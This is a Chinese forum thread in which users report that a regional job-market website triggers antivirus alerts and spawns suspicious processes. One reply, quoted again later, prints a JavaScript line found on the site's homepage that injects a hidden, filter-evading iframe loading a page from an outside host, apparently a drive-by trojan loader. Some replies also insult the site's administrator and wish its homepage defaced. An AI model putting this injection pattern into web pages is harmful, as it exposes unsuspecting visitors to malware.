发新话题
打印

三峡人才市场网站有病毒?

三峡人才市场网站有病毒?

各位大虾:

  不知各位在进三峡人才市场(www.hbsxrc.com.cn)时有没有出现杀毒软件报病毒的情况?我用卡巴斯基服务器版(操作系统2000 高级服务器版,所以卡巴斯基也得用服务器片,已更新为最新病毒库),每次进入三峡人才市场网站时提示有病毒程序????.exe要运行(?为一串数字),我都是直接删除,但进程中每打开一个页面新增一个conime.exe进程和NOTEPAD.EXE进程,我在网上搜索了相关资料,这个进程肯定不是输入法的控制台进程,应当是病毒程序,后来,我删除notepad.exe,NOTEPAD进程再不开启,但在进三峡人才市场网站时conime.exe进程和SVCHOST进程不断出现,这个问题已经让我心烦一个来月了,总是在不断地ghost,还有不断地找杀毒软件(偶穷,只有找免费的),哪位高手碰到过类似问题?是我电脑的问题,还是这个网站真的有问题?有经验的朋友请给个意见和建议,无关主题的朋友请勿骚扰,谢谢!。

  我的操作系统是win2000 sp4+iis5.0,未开启自动更新,只在微软网站下了最新的几个补丁和IE补丁。

Tomorrow is a new day.

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

TOP

document.write("<i"+"frame style='display:none;' src=http://web.xin1234.com/images/ad.htm width=1 height=1 frameborder=0></i"+"frame>");

这个垃圾站谁管的啊?

管理员真他妈的垃圾,那天被人把首页改了,他才会重视的.

上面是我在首页上找到的马!

TOP

看来我的怀疑没错,看来不用去看了,居然还是收费网站,受不了

Tomorrow is a new day.

TOP

垃圾网站,以后大家别去了!

......管理员真TMD垃圾.

....真希望别人把他的首页改掉!

TOP

以下是引用xkp521在2006-10-24 22:02:00的发言:

document.write("<i"+"frame style='display:none;' src=http://web.xin1234.com/images/ad.htm width=1 height=1 frameborder=0></i"+"frame>");

这个垃圾站谁管的啊?

管理员真他妈的垃圾,那天被人把首页改了,他才会重视的.

上面是我在首页上找到的马!


TOP

这年头什么网站才安全呀!
我左八荣,右八耻,代表挂腰间,和谐戴胸前,人挡杀人,佛当杀佛

TOP

....三峡热线就比较安全!

..呵呵!

TOP

发新话题